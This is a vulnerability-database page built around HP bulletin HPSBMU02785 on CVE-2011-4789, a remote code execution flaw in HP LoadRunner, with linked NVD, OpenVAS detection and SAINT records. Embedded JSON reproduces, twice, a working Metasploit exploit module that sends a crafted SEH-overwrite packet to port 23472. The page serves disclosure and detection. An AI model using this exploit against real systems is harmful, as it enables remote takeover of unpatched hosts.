[security bulletin] HPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code
2012-06-03T00:00:00
ID SECURITYVULNS:DOC:28103 Type securityvulns Reporter Securityvulns Modified 2012-06-03T00:00:00
Description
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03216705
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03216705
Version: 1
HPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote
Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2012-05-29
Last Updated: 2012-05-29
Potential Security Impact: Remote execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP LoadRunner
running on Windows. The vulnerability can be exploited remotely to execute
arbitrary code.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP LoadRunner v11.00 before patch 4 running on Windows
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score
CVE-2011-4789 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided HP LoadRunner 11.00 patch 4 to resolve the vulnerability. The
patch is available here: http://support.openview.hp.com/selfsolve/patches
Note: ZDI-12-016 lists the vulnerable product as HP Diagnostics Server.
However, the vulnerable product is actually HP LoadRunner.
HISTORY
Version:1 (rev.1) - 29 May 2012 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
{"id": "SECURITYVULNS:DOC:28103", "bulletinFamily": "software", "title": "[security bulletin] HPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03216705\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03216705\r\nVersion: 1\r\n\r\nHPSBMU02785 SSRT100526 rev.1 - HP LoadRunner Running on Windows, Remote\r\nExecution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-05-29\r\nLast Updated: 2012-05-29\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP LoadRunner\r\nrunning on Windows. The vulnerability can be exploited remotely to execute\r\narbitrary code.\r\n\r\nReferences: CVE-2011-4789, ZDI-CAN-1259, ZDI-12-016\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LoadRunner v11.00 before patch 4 running on Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-4789 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP LoadRunner 11.00 patch 4 to resolve the vulnerability. The\r\npatch is available here: http://support.openview.hp.com/selfsolve/patches\r\n\r\nNote: ZDI-12-016 lists the vulnerable product as HP Diagnostics Server.\r\nHowever, the vulnerable product is actually HP LoadRunner.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 29 May 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk/EyG8ACgkQ4B86/C0qfVkxPwCcDGdeVnI4g47duPYt6lKL/4TY\r\ncA4AoN5TzDvqlNAqmE7+ugUS22TS0PEE\r\n=XxFM\r\n-----END PGP SIGNATURE-----\r\n", "published": "2012-06-03T00:00:00", "modified": "2012-06-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28103", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-4789"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:44", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 9.0, "vector": "NONE", "modified": "2018-08-31T11:10:44", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4789"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:109177"]}, {"type": "saint", "idList": ["SAINT:89D9700DBB0B66D8E27B7CDCB47A9902", "SAINT:BC6A289F830FFB1BFC0E0A00A5C37ED3", "SAINT:7FF37BF05F3FC99D6E72FB18252B32B8"]}, {"type": "exploitdb", "idList": ["EDB-ID:18423"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12998", "SECURITYVULNS:DOC:27557", "SECURITYVULNS:DOC:29247", "SECURITYVULNS:VULN:12143"]}, {"type": "openvas", "idList": ["OPENVAS:802386", "OPENVAS:1361412562310802386"]}, {"type": "nessus", "idList": ["HP_LOADRUNNER_CVE-2011-4789.NASL", "HP_LOADRUNNER_11_PATCH4_CODE_EXEC.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/HP_MAGENTSERVICE"]}, {"type": "zdi", "idList": ["ZDI-12-016"]}], "modified": "2018-08-31T11:10:44", "rev": 2}, "vulnersScore": 9.0}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T05:51:09", "description": "Stack-based buffer overflow in magentservice.exe in the server in HP LoadRunner 11.00 before patch 4 allows remote attackers to execute arbitrary code via a crafted size value in a packet. NOTE: it was originally reported that the affected product is HP Diagnostics Server, but HP states that \"the vulnerable product is actually HP LoadRunner.\"", "edition": 4, "cvss3": {}, "published": "2012-01-13T04:14:00", "title": "CVE-2011-4789", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4789"], "modified": "2012-11-28T04:31:00", "cpe": ["cpe:/a:hp:diagnostics:*"], "id": "CVE-2011-4789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4789", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:diagnostics:*:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-15T17:29:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "description": "This host is running HP Diagnostics Server and is prone to\n buffer overflow vulnerability.", "modified": "2020-05-13T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:1361412562310802386", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802386", "type": "openvas", "title": "HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:diagnostics_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802386\");\n script_version(\"2020-05-13T09:51:33+0000\");\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-13 09:51:33 +0000 (Wed, 13 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 14:14:14 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47574/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2012/Jan/88\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_hp_diagnostics_server_detect.nasl\");\n script_mandatory_keys(\"hp/diagnostics_server/detected\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may allow remote attackers to execute\n arbitrary code within the context of the application or cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"HP Diagnostics Server 9.00.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the magentservice.exe process\n when processing a specially crafted request sent to TCP port 23472 and causing\n a stack-based buffer overflow.\");\n\n script_tag(name:\"summary\", value:\"This host is running HP Diagnostics Server and is prone to\n buffer overflow vulnerability.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since\n the disclosure of this vulnerability. Likely none will be provided anymore. General solution options\n are to upgrade to a newer release, disable respective features, remove the product or replace the\n product by another one.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_equal(version:vers, test_version:\"9.00\")) {\n report = report_fixed_ver(installed_version:vers, vulnerable_range:\"Equal to 9.00\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4789"], "description": "This host is running HP Diagnostics Server and is prone to\nbuffer overflow vulnerability.", "modified": "2017-04-21T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:802386", "href": "http://plugins.openvas.org/nasl.php?oid=802386", "type": "openvas", "title": "HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_diagnostics_server_magentservice_bof_vuln.nasl 5999 2017-04-21 09:02:32Z teissa $\n#\n# HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Upgrade to HP LoadRunner 11.0 patch4 or later,\nFor updates refer to http://www.hp.com/ \";\n\ntag_impact = \"Successful exploitation may allow remote attackers to execute\narbitrary code within the context of the application or cause a denial of service\ncondition.\n\nImpact Level: System/Application\";\n\ntag_affected = \"HP Diagnostics Server 9.00\";\n\ntag_insight = \"The flaw is due to an error within the magentservice.exe process\nwhen processing a specially crafted request sent to TCP port 23472 and causing\na stack-based buffer overflow.\";\n\ntag_summary = \"This host is running HP Diagnostics Server and is prone to\nbuffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(802386);\n script_version(\"$Revision: 5999 $\");\n script_cve_id(\"CVE-2011-4789\");\n script_bugtraq_id(51398);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 14:14:14 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"HP Diagnostics Server 'magentservice.exe' Buffer Overflow Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47574/\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/bugtraq/2012/Jan/88\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-12-016/\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_hp_diagnostics_server_detect.nasl\");\n script_require_ports(\"Services/www\", 2006, 23472);\n script_require_keys(\"hpdiagnosticsserver/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\n## HP Diagnostics Server and magentservice port\nhpdsPort = get_http_port(default:2006);\nmagentPort = 23472;\n\nif(!get_port_state(hpdsPort) || !get_port_state(magentPort)){\n exit(0);\n}\n\n##Get Version from KB\nhpdsVer = get_kb_item(\"www/\" + hpdsPort+ \"/HP/Diagnostics_Server/Ver\");\n\nif(hpdsVer)\n{\n if(version_is_equal(version:hpdsVer, test_version:\"9.00\")){\n security_message(magentPort);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "description": "Added: 01/26/2012 \nCVE: [CVE-2011-4789](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789>) \nBID: [51398](<http://www.securityfocus.com/bid/51398>) \nOSVDB: [78309](<http://www.osvdb.org/78309>) \n\n\n### Background\n\nHP Diagnostics software monitors application transaction health in traditional, virtualized and cloud environments. \n\n### Problem\n\nA vulnerability exists in the way the magentservice.exe service handles network requests. Subtraction is applied to part of the packet to determine how much memory to allocate. If a message is crafted such that an integer wrap occurs during this subtraction, a stack overflow may occur, which may allow an attacker to gain execution control. \n\n### Resolution\n\nA patch is not available at the time of publication. Limit access to TCP port 23472. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-016/> \n\n\n### Limitations\n\nThis exploit has been tested against HP Diagnostics Server 9.10 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\nExploit requires the IO-Socket-SSL PERL module to be installed on the scanning host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-01-26T00:00:00", "published": "2012-01-26T00:00:00", "id": "SAINT:89D9700DBB0B66D8E27B7CDCB47A9902", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_diagnostics_magentservice_intwrap", "type": "saint", "title": "HP Diagnostics Server magentservice.exe Integer Wrap", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "description": "Added: 01/26/2012 \nCVE: [CVE-2011-4789](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789>) \nBID: [51398](<http://www.securityfocus.com/bid/51398>) \nOSVDB: [78309](<http://www.osvdb.org/78309>) \n\n\n### Background\n\nHP Diagnostics software monitors application transaction health in traditional, virtualized and cloud environments. \n\n### Problem\n\nA vulnerability exists in the way the magentservice.exe service handles network requests. Subtraction is applied to part of the packet to determine how much memory to allocate. If a message is crafted such that an integer wrap occurs during this subtraction, a stack overflow may occur, which may allow an attacker to gain execution control. \n\n### Resolution\n\nA patch is not available at the time of publication. Limit access to TCP port 23472. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-016/> \n\n\n### Limitations\n\nThis exploit has been tested against HP Diagnostics Server 9.10 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\nExploit requires the IO-Socket-SSL PERL module to be installed on the scanning host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-01-26T00:00:00", "published": "2012-01-26T00:00:00", "id": "SAINT:7FF37BF05F3FC99D6E72FB18252B32B8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_diagnostics_magentservice_intwrap", "title": "HP Diagnostics Server magentservice.exe Integer Wrap", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "edition": 2, "description": "Added: 01/26/2012 \nCVE: [CVE-2011-4789](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789>) \nBID: [51398](<http://www.securityfocus.com/bid/51398>) \nOSVDB: [78309](<http://www.osvdb.org/78309>) \n\n\n### Background\n\nHP Diagnostics software monitors application transaction health in traditional, virtualized and cloud environments. \n\n### Problem\n\nA vulnerability exists in the way the magentservice.exe service handles network requests. Subtraction is applied to part of the packet to determine how much memory to allocate. If a message is crafted such that an integer wrap occurs during this subtraction, a stack overflow may occur, which may allow an attacker to gain execution control. \n\n### Resolution\n\nA patch is not available at the time of publication. Limit access to TCP port 23472. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-016/> \n\n\n### Limitations\n\nThis exploit has been tested against HP Diagnostics Server 9.10 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\nExploit requires the IO-Socket-SSL PERL module to be installed on the scanning host. This module is available from <http://www.cpan.org/modules/by-module/IO/>. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-01-26T00:00:00", "published": "2012-01-26T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_diagnostics_magentservice_intwrap", "id": "SAINT:BC6A289F830FFB1BFC0E0A00A5C37ED3", "type": "saint", "title": "HP Diagnostics Server magentservice.exe Integer Wrap", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:42", "description": "", "published": "2012-01-28T00:00:00", "type": "packetstorm", "title": "HP Diagnostics Server magentservice.exe Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "modified": "2012-01-28T00:00:00", "id": "PACKETSTORM:109177", "href": "https://packetstormsecurity.com/files/109177/HP-Diagnostics-Server-magentservice.exe-Overflow.html", "sourceData": "`require 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP Diagnostics Server magentservice.exe overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP Diagnostics Server \nmagentservice.exe service. By sending a specially crafted packet, an attacker \nmay be able to execute arbitrary code. Originally found and posted by \nAbdulAziz Harir via ZDI. \n}, \n'Author' => \n[ \n'AbdulAziz Hariri', # Original discovery \n'hal', # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['OSVDB', '72815'], \n['CVE', '2011-4789'], \n['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/'] \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n'SSL' => true, \n'SSLVersion' => 'SSL3' \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'DefaultTarget' => 0, \n'Targets' => \n[ \n[ \n'Diagnostics Server 9.10', \n{ \n# pop esi # pop ebx # ret 10 \n# magentservice.exe \n'Ret' => 0x780c8f1f \n} \n] \n], \n'DisclosureDate' => 'Jan 12 2012')) \n \nregister_options([Opt::RPORT(23472)], self.class) \nend \n \ndef exploit \n \nreq = \"\\x00\\x00\\x00\\x00\" \nreq << rand_text_alpha_upper(1092) \nreq << generate_seh_payload(target.ret) \n \nconnect \nsock.put(req) \n \nhandler \ndisconnect \n \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/109177/hp_magentservice.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T09:41:56", "description": "HP Diagnostics Server magentservice.exe overflow. CVE-2011-4789. Remote exploit for windows platform", "published": "2012-01-27T00:00:00", "type": "exploitdb", "title": "HP Diagnostics Server magentservice.exe Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4789"], "modified": "2012-01-27T00:00:00", "id": "EDB-ID:18423", "href": "https://www.exploit-db.com/exploits/18423/", "sourceData": "require 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP Diagnostics Server magentservice.exe overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP Diagnostics Server\r\n\t\t\t\tmagentservice.exe service. By sending a specially crafted packet, an attacker\r\n\t\t\t\tmay be able to execute arbitrary code. Originally found and posted by\r\n\t\t\t\tAbdulAziz Harir via ZDI.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'AbdulAziz Hariri', # Original discovery\r\n\t\t\t\t\t'hal', # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB', '72815'],\r\n\t\t\t\t\t['CVE', '2011-4789'],\r\n\t\t\t\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t\t'SSL' => true,\r\n\t\t\t\t\t'SSLVersion' => 'SSL3'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Diagnostics Server 9.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t# pop esi # pop ebx # ret 10\r\n\t\t\t\t\t\t\t# magentservice.exe\r\n\t\t\t\t\t\t\t'Ret' => 0x780c8f1f\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 12 2012'))\r\n\r\n\t\t\tregister_options([Opt::RPORT(23472)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\treq = \"\\x00\\x00\\x00\\x00\"\r\n\t\treq << rand_text_alpha_upper(1092)\r\n\t\treq << generate_seh_payload(target.ret)\r\n\r\n\t\tconnect\r\n\t\tsock.put(req)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18423/"}], "zdi": [{"lastseen": "2020-06-22T11:41:41", "bulletinFamily": "info", "cvelist": ["CVE-2011-4789"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on 